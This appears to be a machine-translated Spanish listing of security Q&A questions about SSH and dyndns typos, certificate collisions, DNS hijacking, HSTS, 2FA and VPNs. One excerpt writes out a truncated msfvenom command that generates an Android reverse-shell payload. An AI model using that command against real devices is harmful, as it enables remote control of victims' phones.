Todas las preguntas

2
respuestas

¿Debo preocuparme si he intentado ingresar a un sitio "falso" dyndns.org? (con teclas ssh)

A menudo ssh en servidores para trabajar y jugar usando dns dinámicos con teclas ssh que están protegidas por contraseña. Dos veces (¡qué vergüenza!) He escrito mal la parte dyndns.org de la dirección y me han recibido varias indicaciones de con...
pregunta 12.11.2015 - 23:25
1
respuesta

msfvenom problema de carga útil

¡Esto es solo para fines educativos! Estoy intentando generar una carga útil de Android usando el generador independiente de la carga útil de msfconsole: msfvenom con el comando: msfvenom -p android/shell/reverse_tcp LHOST=192.168.10...
pregunta 01.11.2015 - 09:09
1
respuesta

Vulnerabilidad de colisión de firma de certificado X.509

El cliente se quejó de que durante el análisis de seguridad realizado en nuestra aplicación, surgió lo siguiente: 172.22.0.19 - xxxxx - IETF X.509 Certificate Signature Collision Vulnerability - https/tcp/172.22.0.19/50000 El almacén de cla...
pregunta 17.12.2015 - 13:35
1
respuesta

¿Por qué un certificado SSL hecho por sí mismo no puede tener una firma falsa? [duplicar]

Déjame explicarte lo que quiero decir. He leído ¿Por qué es difícil falsificar el certificado SSL y mi pregunta? Es una especie de paso más allá de eso. Si alguna persona aleatoria crea un certificado, ¿qué les impide crear el certificado de...
pregunta 01.12.2015 - 08:18
2
respuestas

Amazon sigue pidiendo información de inicio de sesión / cc a través de una página no segura - ¿Secuestro de DNS?

Todas mis computadoras en la casa no se conectarán a Amazon.com, pero sí algunas páginas de inicio de sesión de Amazon no seguras (http). Esta es la segunda vez que tengo este problema. La primera vez que lo resolví cambiando mis servidores DNS...
pregunta 21.11.2015 - 23:59
2
respuestas

¿Necesita DNSSEC si usa HSTS? [duplicar]

Estoy tratando de entender los beneficios de DNSSEC. Si un usuario va a mi sitio example.com y el caché de DNS se envenenó redirigiendo al usuario a la IP del malo, ¿qué pasaría? He habilitado HSTS. Según tengo entendido, el us...
pregunta 12.05.2018 - 21:07
2
respuestas

Mensaje de telegrama (u otro mensajero) como segundo factor en 2FA

¿Es seguro enviar código a través del bot de messenger y usarlo como segundo factor en la autenticación? El esquema parece el mismo que el de SMS. Un usuario abre la aplicación o mira una notificación de inserción y usa el código. ¿Por qué nadie...
pregunta 07.11.2018 - 09:46
2
respuestas

¿Puede un proveedor de VPN leer mis correos?

Estoy usando mail.com sobre HTTPS. Envié un correo electrónico y me conecté a través de mi acceso a la empresa VPN. ¿Es posible que el administrador de mi empresa pueda leer mis correos? Usé el inicio de sesión de Firefox / Webbrowser de mail.co...
pregunta 16.05.2018 - 20:59
2
respuestas

¿Por qué almacenamos la identificación de la sesión en lugar de la identificación del usuario dentro de las cookies?

¿No sería mejor almacenar el ID de usuario en lugar del ID de sesión para que solo busquemos la base de datos una vez para extraer otra información del usuario en lugar de extraer dos veces el ID de usuario de la sesión db y luego el db?     
pregunta 22.08.2018 - 16:55
1
respuesta

¿Dónde ocurre el cifrado con una VPN cifrada?

He estado probando ExpressVPN para conectarse a Internet. Lo he usado principalmente en una cafetería que uso regularmente. Veo esta pregunta con respuestas: Diferencias entre el uso del navegador Tor y la VPN Aquí la respuesta acepta...
pregunta 06.09.2018 - 18:39